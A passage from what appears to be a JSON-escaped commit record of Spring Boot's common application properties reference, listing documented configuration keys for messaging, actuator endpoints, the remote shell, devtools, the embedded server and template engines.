executed.\n\tspring.batch.schema=classpath:org\/springframework\/batch\/core\/schema-@@platform@@.sql # Path to the SQL file to use to initialize the database schema.\n\tspring.batch.table-prefix= # Table prefix for all the batch meta-data tables.\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.hornetq.embedded.data-directory= # Journal file directory. Not necessary if persistence is turned off.\n\tspring.hornetq.embedded.enabled=true # Enable embedded mode if the HornetQ server APIs are available.\n\tspring.hornetq.embedded.persistent=false # Enable persistent store.\n\tspring.hornetq.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.hornetq.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.hornetq.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.hornetq.host=localhost # HornetQ broker host.\n\tspring.hornetq.mode= # HornetQ deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.hornetq.port=5445 # HornetQ broker port.\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # Connection factory JNDI name. When set, takes precedence to others connection factory auto-configurations.\n\tspring.jms.listener.acknowledge-mode= # Acknowledge mode of the container. By default, the listener is transacted with automatic acknowledgment.\n\tspring.jms.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.jms.listener.concurrency= # Minimum number of concurrent consumers.\n\tspring.jms.listener.max-concurrency= # Maximum number of concurrent consumers.\n\tspring.jms.pub-sub-domain=false # Specify if the default destination type is topic.\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # Comma-separated list of addresses to which the client should connect to.\n\tspring.rabbitmq.dynamic=true # Create an AmqpAdmin bean.\n\tspring.rabbitmq.host=localhost # RabbitMQ host.\n\tspring.rabbitmq.listener.acknowledge-mode= # Acknowledge mode of container.\n\tspring.rabbitmq.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.rabbitmq.listener.concurrency= # Minimum number of consumers.\n\tspring.rabbitmq.listener.max-concurrency= # Maximum number of consumers.\n\tspring.rabbitmq.listener.prefetch= # Number of messages to be handled in a single request. It should be greater than or equal to the transaction size (if used).\n\tspring.rabbitmq.listener.transaction-size= # Number of messages to be processed in a transaction. For best results it should be less than or equal to the prefetch count.\n\tspring.rabbitmq.password= # Login to authenticate against the broker.\n\tspring.rabbitmq.port=5672 # RabbitMQ port.\n\tspring.rabbitmq.requested-heartbeat= # Requested heartbeat timeout, in seconds; zero for none.\n\tspring.rabbitmq.ssl.enabled=false # Enable SSL support.\n\tspring.rabbitmq.ssl.key-store= # Path to the key store that holds the SSL certificate.\n\tspring.rabbitmq.ssl.key-store-password= # Password used to access the key store.\n\tspring.rabbitmq.ssl.trust-store= # Trust store that holds SSL certificates.\n\tspring.rabbitmq.ssl.trust-store-password= # Password used to access the trust store.\n\tspring.rabbitmq.username= # Login user to authenticate to the broker.\n\tspring.rabbitmq.virtual-host= # Virtual host to use when connecting to the broker.\n\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.enabled=true # Enable endpoints.\n\tendpoints.sensitive= # Default endpoint sensitive setting.\n\tendpoints.actuator.enabled=true # Enable the endpoint.\n\tendpoints.actuator.path= # Endpoint URL path.\n\tendpoints.actuator.sensitive=false # Enable security on the endpoint.\n\tendpoints.autoconfig.enabled= # Enable the endpoint.\n\tendpoints.autoconfig.id= # Endpoint identifier.\n\tendpoints.autoconfig.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.beans.enabled= # Enable the endpoint.\n\tendpoints.beans.id= # Endpoint identifier.\n\tendpoints.beans.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.configprops.enabled= # Enable the endpoint.\n\tendpoints.configprops.id= # Endpoint identifier.\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized. Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.configprops.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.docs.curies.enabled=false # Enable the curie generation.\n\tendpoints.docs.enabled=true # Enable actuator docs endpoint.\n\tendpoints.docs.path=\/docs #\n\tendpoints.docs.sensitive=false #\n\tendpoints.dump.enabled= # Enable the endpoint.\n\tendpoints.dump.id= # Endpoint identifier.\n\tendpoints.dump.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.env.enabled= # Enable the endpoint.\n\tendpoints.env.id= # Endpoint identifier.\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized. Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.env.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.flyway.enabled= # Enable the endpoint.\n\tendpoints.flyway.id= # Endpoint identifier.\n\tendpoints.flyway.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.enabled= # Enable the endpoint.\n\tendpoints.health.id= # Endpoint identifier.\n\tendpoints.health.mapping.*= # Mapping of health statuses to HttpStatus codes. By default, registered health statuses map to sensible defaults (i.e. UP maps to 200).\n\tendpoints.health.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.time-to-live=1000 # Time to live for cached result, in milliseconds.\n\tendpoints.info.enabled= # Enable the endpoint.\n\tendpoints.info.id= # Endpoint identifier.\n\tendpoints.info.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.jolokia.enabled=true # Enable Jolokia endpoint.\n\tendpoints.jolokia.path=\/jolokia # Endpoint URL path.\n\tendpoints.jolokia.sensitive=true # Enable security on the endpoint.\n\tendpoints.liquibase.enabled= # Enable the endpoint.\n\tendpoints.liquibase.id= # Endpoint identifier.\n\tendpoints.liquibase.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.logfile.enabled=true # Enable the endpoint.\n\tendpoints.logfile.path=\/logfile # Endpoint URL path.\n\tendpoints.logfile.sensitive=true # Enable security on the endpoint.\n\tendpoints.mappings.enabled= # Enable the endpoint.\n\tendpoints.mappings.id= # Endpoint identifier.\n\tendpoints.mappings.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.metrics.enabled= # Enable the endpoint.\n\tendpoints.metrics.filter.enabled=true # Enable the metrics servlet filter.\n\tendpoints.metrics.id= # Endpoint identifier.\n\tendpoints.metrics.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.shutdown.enabled= # Enable the endpoint.\n\tendpoints.shutdown.id= # Endpoint identifier.\n\tendpoints.shutdown.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.trace.enabled= # Enable the endpoint.\n\tendpoints.trace.id= # Endpoint identifier.\n\tendpoints.trace.sensitive= # Mark if the endpoint exposes sensitive information.\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/EndpointCorsProperties.{sc-ext}[EndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # Set whether credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-headers= # Comma-separated list of headers to allow in a request. '*' allows all headers.\n\tendpoints.cors.allowed-methods=GET # Comma-separated list of methods to allow. '*' allows all methods.\n\tendpoints.cors.allowed-origins= # Comma-separated list of origins to allow. '*' allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.exposed-headers= # Comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # How long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.domain= # JMX domain name. Initialized with the value of 'spring.jmx.default-domain' if set.\n\tendpoints.jmx.enabled=true # Enable JMX export of all endpoints.\n\tendpoints.jmx.static-names= # Additional static properties to append to all ObjectNames of MBeans representing Endpoints.\n\tendpoints.jmx.unique-names=false # Ensure that ObjectNames are modified in case of conflict.\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.add-application-context-header=true # Add the \"X-Application-Context\" HTTP header in each response.\n\tmanagement.address= # Network address that the management endpoints should bind to.\n\tmanagement.context-path= # Management endpoint context-path. For instance `\/actuator`\n\tmanagement.port= # Management endpoint HTTP port. Use the same port as the application by default.\n\tmanagement.security.enabled=true # Enable security.\n\tmanagement.security.role=ADMIN # Role required to access the management endpoint.\n\tmanagement.security.sessions=stateless # Session creating policy to use (always, never, if_required, stateless).\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true # Enable database health check.\n\tmanagement.health.defaults.enabled=true # Enable default health indicators.\n\tmanagement.health.diskspace.enabled=true # Enable disk space health check.\n\tmanagement.health.diskspace.path= # Path used to compute the available disk space.\n\tmanagement.health.diskspace.threshold=0 # Minimum disk space that should be available, in bytes.\n\tmanagement.health.elasticsearch.enabled=true # Enable elasticsearch health check.\n\tmanagement.health.elasticsearch.indices= # Comma-separated index names.\n\tmanagement.health.elasticsearch.response-timeout=100 # The time, in milliseconds, to wait for a response from the cluster.\n\tmanagement.health.jms.enabled=true # Enable JMS health check.\n\tmanagement.health.mail.enabled=true # Enable Mail health check.\n\tmanagement.health.mongo.enabled=true # Enable MongoDB health check.\n\tmanagement.health.rabbit.enabled=true # Enable RabbitMQ health check.\n\tmanagement.health.redis.enabled=true # Enable Redis health check.\n\tmanagement.health.solr.enabled=true # Enable Solr health check.\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP # Comma-separated list of health statuses in order of severity.\n\n\t# TRACING (({sc-spring-boot-actuator}\/trace\/TraceProperties.{sc-ext}[TraceProperties])\n\tmanagement.trace.include=request-headers,response-headers,errors # Items to be included in the trace.\n\n\t# REMOTE SHELL\n\tshell.auth=simple # Authentication type. Auto-detected according to the environment.\n\tshell.auth.jaas.domain=my-domain # JAAS domain.\n\tshell.auth.key.path= # Path to the authentication key. This should point to a valid \".pem\" file.\n\tshell.auth.simple.user.name=user # Login user.\n\tshell.auth.simple.user.password= # Login password.\n\tshell.auth.spring.roles=ADMIN # Comma-separated list of required roles to login to the CRaSH console.\n\tshell.command-path-patterns=classpath*:\/commands\/**,classpath*:\/crash\/commands\/** # Patterns to use to look for commands.\n\tshell.command-refresh-interval=-1 # Scan for changes and update the command if necessary (in seconds).\n\tshell.config-path-patterns=classpath*:\/crash\/* # Patterns to use to look for configurations.\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # Comma-separated list of commands to disable.\n\tshell.disabled-plugins= # Comma-separated list of plugins to disable. Certain plugins are disabled by default based on the environment.\n\tshell.ssh.auth-timeout = # Number of milliseconds after user will be prompted to login again.\n\tshell.ssh.enabled=true # Enable CRaSH SSH support.\n\tshell.ssh.idle-timeout = # Number of milliseconds after which unused connections are closed.\n\tshell.ssh.key-path= # Path to the SSH server key.\n\tshell.ssh.port=2000 # SSH port.\n\tshell.telnet.enabled=false # Enable CRaSH telnet support. Enabled by default if the TelnetPlugin is available.\n\tshell.telnet.port=5000 # Telnet port.\n\n\t# GIT INFO\n\tspring.git.properties= # Resource reference to a generated git info properties file.\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.aggregate.key-pattern= # Pattern that tells the aggregator what to do with the keys from the source repository.\n\tspring.metrics.export.aggregate.prefix= # Prefix for global repository if active.\n\tspring.metrics.export.delay-millis=5000 # Delay in milliseconds between export ticks. Metrics are exported to external sources on a schedule with this delay.\n\tspring.metrics.export.enabled=true # Flag to enable metric export (assuming a MetricWriter is available).\n\tspring.metrics.export.excludes= # List of patterns for metric names to exclude. Applied after the includes.\n\tspring.metrics.export.includes= # List of patterns for metric names to include.\n\tspring.metrics.export.redis.key=keys.spring.metrics # Key for redis repository export (if active).\n\tspring.metrics.export.redis.prefix=spring.metrics # Prefix for redis repository if active.\n\tspring.metrics.export.send-latest= # Flag to switch off any available optimizations based on not exporting unchanged metric values.\n\tspring.metrics.export.statsd.host= # Host of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.port=8125 # Port of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.prefix= # Prefix for statsd exported metrics.\n\tspring.metrics.export.triggers.*= # Specific trigger properties per MetricWriter bean name.\n\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n\t# DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n\tspring.devtools.livereload.enabled=true # Enable a livereload.com compatible server.\n\tspring.devtools.livereload.port=35729 # Server port.\n\tspring.devtools.restart.additional-exclude= # Additional patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.additional-paths= # Additional paths to watch for changes.\n\tspring.devtools.restart.enabled=true # Enable automatic restart.\n\tspring.devtools.restart.exclude=META-INF\/maven\/**,META-INF\/resources\/**,resources\/**,static\/**,public\/**,templates\/**,**\/*Test.class,**\/*Tests.class,git.properties # Patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.poll-interval=1000 # Amount of time (in milliseconds) to wait between polling for classpath changes.\n\tspring.devtools.restart.quiet-period=400 # Amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered.\n\tspring.devtools.restart.trigger-file= # Name of a specific file that when changed will trigger the restart check. If not specified any classpath file change will trigger the restart.\n\n\t# REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n\tspring.devtools.remote.context-path=\/.~~spring-boot!~ # Context path used to handle the remote connection.\n\tspring.devtools.remote.debug.enabled=true # Enable remote debug support.\n\tspring.devtools.remote.debug.local-port=8000 # Local remote debug server port.\n\tspring.devtools.remote.proxy.host= # The host of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.proxy.port= # The port of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.restart.enabled=true # Enable remote restart.\n\tspring.devtools.remote.secret= # A shared secret required to establish a connection (required to enable remote support).\n\tspring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret.\n\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# BANNER\n\tbanner.charset=UTF-8 # Banner file encoding.\n\tbanner.location=classpath:banner.txt # Banner file location.\n\n\t# LOGGING\n\tlogging.config= # Location of the logging configuration file. For instance `classpath:logback.xml` for Logback\n\tlogging.exception-conversion-word=%wEx # Conversion word used when logging exceptions.\n\tlogging.file= # Log file name. For instance `myapp.log`\n\tlogging.level.*= # Log levels severity mapping. For instance `logging.level.org.springframework=DEBUG`\n\tlogging.path= # Location of the log file. For instance `\/var\/log`\n\tlogging.pattern.console= # Appender pattern for output to the console. Only supported with the default logback setup.\n\tlogging.pattern.file= # Appender pattern for output to the file. Only supported with the default logback setup.\n\tlogging.pattern.level= # Appender pattern for log level (default %5p). Only supported with the default logback setup.\n\tlogging.register-shutdown-hook=false # Register a shutdown hook for the logging system when it is initialized.\n\n\t# AOP\n\tspring.aop.auto=true # Add @EnableAspectJAutoProxy.\n\tspring.aop.proxy-target-class=false # Whether subclass-based (CGLIB) proxies are to be created (true) as opposed to standard Java interface-based proxies (false).\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.index= # Application index.\n\tspring.application.name= # Application name.\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # Enable admin features for the application.\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean.\n\n\t# AUTO-CONFIGURATION\n\tspring.autoconfigure.exclude= # Auto-configuration classes to exclude.\n\n\t# SPRING CORE\n\tspring.beaninfo.ignore=true # Skip search of BeanInfo classes.\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.cache-names= # Comma-separated list of cache names to create if supported by the underlying cache manager.\n\tspring.cache.ehcache.config= # The location of the configuration file to use to initialize EhCache.\n\tspring.cache.guava.spec= # The spec to use to create caches. Check CacheBuilderSpec for more details on the spec format.\n\tspring.cache.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\tspring.cache.infinispan.config= # The location of the configuration file to use to initialize Infinispan.\n\tspring.cache.jcache.config= # The location of the configuration file to use to initialize the cache manager.\n\tspring.cache.jcache.provider= # Fully qualified name of the CachingProvider implementation to use to retrieve the JSR-107 compliant cache manager. Only needed if more than one JSR-107 implementation is available on the classpath.\n\tspring.cache.type= # Cache type, auto-detected according to the environment by default.\n\n\t# SPRING CONFIG - using environment property only ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.location= # Config file locations.\n\tspring.config.name=application # Config file name.\n\n\t# HAZELCAST ({sc-spring-boot-autoconfigure}\/hazelcast\/HazelcastProperties.{sc-ext}[HazelcastProperties])\n\tspring.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name.\n\tspring.jmx.enabled=true # Expose management beans to the JMX domain.\n\tspring.jmx.server=mbeanServer # MBeanServer bean name.\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.default-encoding=UTF-8 # Default MimeMessage encoding.\n\tspring.mail.host= # SMTP server host. For instance `smtp.example.com`\n\tspring.mail.jndi-name= # Session JNDI name. When set, takes precedence to others mail settings.\n\tspring.mail.password= # Login password of the SMTP server.\n\tspring.mail.port= # SMTP server port.\n\tspring.mail.properties.*= # Additional JavaMail session properties.\n\tspring.mail.protocol=smtp # Protocol used by the SMTP server.\n\tspring.mail.test-connection=false # Test that the mail server is available on startup.\n\tspring.mail.username= # Login user of the SMTP server.\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.banner-mode=console # Mode used to display the banner when the application runs.\n\tspring.main.sources= # Sources (class name, package name or XML resource location) to include in the ApplicationContext.\n\tspring.main.web-environment= # Run the application in a web environment (auto-detected by default).\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use.\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages # Comma-separated list of basenames, each following the ResourceBundle convention.\n\tspring.messages.cache-seconds=-1 # Loaded resource bundle files cache expiration, in seconds. When set to -1, bundles are cached forever.\n\tspring.messages.encoding=UTF-8 # Message bundles encoding.\n\tspring.messages.fallback-to-system-locale=true # Set whether to fall back to the system Locale if no files for a specific Locale have been found.\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (can be \"detect\", \"always\", \"never\").\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.fail-on-write-error= # Fail if ApplicationPidFileWriter is used but it cannot write the PID file.\n\tspring.pid.file= # Location of the PID file to write (if ApplicationPidFileWriter is used).\n\n\t# PROFILES\n\tspring.profiles.active= # Comma-separated list of <<howto-set-active-spring-profiles,active profiles>>.\n\tspring.profiles.include= # Unconditionally activate the specified comma separated profiles.\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.api-key= # SendGrid api key (alternative to username\/password)\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\n\t# ----------------------------------------\n\t# WEB PROPERTIES\n\t# ----------------------------------------\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true # Enable support of multi-part uploads.\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk. Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size. Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\tmultipart.max-request-size=10Mb # Max request size. Values can use the suffixed \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.address= # Network address to which the server should bind to.\n\tserver.compression.enabled=false # If response compression is enabled.\n\tserver.compression.excluded-user-agents= # List of user-agents to exclude from compression.\n\tserver.compression.mime-types= # Comma-separated list of MIME types that should be compressed. For instance `text\/html,text\/css,application\/json`\n\tserver.compression.min-response-size= # Minimum response size that is required for compression to be performed. For instance 2048\n\tserver.context-parameters.*= # Servlet context init parameters. For instance `server.context-parameters.a=alpha`\n\tserver.context-path= # Context path of the application.\n\tserver.display-name=application # Display name of the application.\n\tserver.error.include-stacktrace=never # When to include a \"stacktrace\" attribute.\n\tserver.error.path=\/error # Path of the error controller.\n\tserver.error.whitelabel.enabled=true # Enable the default error page displayed in browsers in case of a server error.\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet.\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.port=8080 # Server HTTP port.\n\tserver.server-header= # The value sent in the server response header (uses servlet container default if empty)\n\tserver.servlet-path=\/ # Path of the main dispatcher servlet.\n\tserver.session.cookie.comment= # Comment for the session cookie.\n\tserver.session.cookie.domain= # Domain for the session cookie.\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie.\n\tserver.session.cookie.max-age= # Maximum age of the session cookie in seconds.\n\tserver.session.cookie.name= # Session cookie name.\n\tserver.session.cookie.path= # Path of the session cookie.\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie.\n\tserver.session.persistent=false # Persist session data between restarts.\n\tserver.session.store-dir= # Directory used to store session data.\n\tserver.session.timeout= # Session timeout in seconds.\n\tserver.session.tracking-modes= # Session tracking modes (one or more of the following: \"cookie\", \"url\", \"ssl\").\n\tserver.ssl.ciphers= # Supported SSL ciphers.\n\tserver.ssl.client-auth= # Whether client authentication is wanted (\"want\") or needed (\"need\"). Requires a trust store.\n\tserver.ssl.enabled= #\n\tserver.ssl.key-alias= #\n\tserver.ssl.key-password= #\n\tserver.ssl.key-store= #\n\tserver.ssl.key-store-password= #\n\tserver.ssl.key-store-provider= #\n\tserver.ssl.key-store-type= #\n\tserver.ssl.protocol= #\n\tserver.ssl.trust-store= #\n\tserver.ssl.trust-store-password= #\n\tserver.ssl.trust-store-provider= #\n\tserver.ssl.trust-store-type= #\n\tserver.tomcat.accesslog.directory=logs # Directory in which log files are created. Can be relative to the tomcat base dir or absolute.\n\tserver.tomcat.accesslog.enabled=false # Enable access log.\n\tserver.tomcat.accesslog.pattern=common # Format pattern for access logs.\n\tserver.tomcat.accesslog.prefix=access_log # Log file name prefix.\n\tserver.tomcat.accesslog.suffix=.log # Log file name suffix.\n\tserver.tomcat.background-processor-delay=30 # Delay in seconds between the invocation of backgroundProcess methods.\n\tserver.tomcat.basedir= # Tomcat base directory. If not specified a temporary directory will be used.\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses.\n\tserver.tomcat.max-http-header-size=0 # Maximum size in bytes of the HTTP message header.\n\tserver.tomcat.max-threads=0 # Maximum amount of worker threads.\n\tserver.tomcat.port-header=X-Forwarded-Port # Name of the HTTP header used to override the original port value.\n\tserver.tomcat.protocol-header= # Header that holds the incoming protocol, usually named \"X-Forwarded-Proto\".\n\tserver.tomcat.protocol-header-https-value=https # Value of the protocol header that indicates that the incoming request uses SSL.\n\tserver.tomcat.remote-ip-header= # Name of the http header from which the remote ip is extracted. For instance `X-FORWARDED-FOR`\n\tserver.tomcat.uri-encoding=UTF-8 # Character encoding to use to decode the URI.\n\tserver.undertow.accesslog.dir= # Undertow access log directory.\n\tserver.undertow.accesslog.enabled=false # Enable access log.\n\tserver.undertow.accesslog.pattern=common # Format pattern for access logs.\n\tserver.undertow.buffer-size= # Size of each buffer in bytes.\n\tserver.undertow.buffers-per-region= # Number of buffer per region.\n\tserver.undertow.direct-buffers= # Allocate buffers outside the Java heap.\n\tserver.undertow.io-threads= # Number of I\/O threads to create for the worker.\n\tserver.undertow.worker-threads= # Number of worker threads.\n\tserver.use-forward-headers= # If X-Forwarded-* headers should be applied to the HttpRequest.\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.cache=false # Enable template caching.\n\tspring.freemarker.charset=UTF-8 # Template encoding.\n\tspring.freemarker.check-template-location=true # Check that the templates location exists.\n\tspring.freemarker.content-type=text\/html # Content-Type value.\n\tspring.freemarker.enabled=true # Enable MVC view resolution for this technology.\n\tspring.freemarker.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.freemarker.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.freemarker.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.freemarker.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.freemarker.settings.*= # Well-known FreeMarker keys which will be passed to FreeMarker's Configuration.\n\tspring.freemarker.suffix= # Suffix that gets appended to view names when building a URL.\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # Comma-separated list of template paths.\n\tspring.freemarker.view-names= # White list of view names that can be resolved.\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.cache= # Enable template caching.\n\tspring.groovy.template.charset=UTF-8 # Template encoding.\n\tspring.groovy.template.check-template-location=true # Check that the templates location exists.\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=test\/html # Content-Type value.\n\tspring.groovy.template.enabled=true # Enable MVC view resolution for this technology.\n\tspring.groovy.template.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to 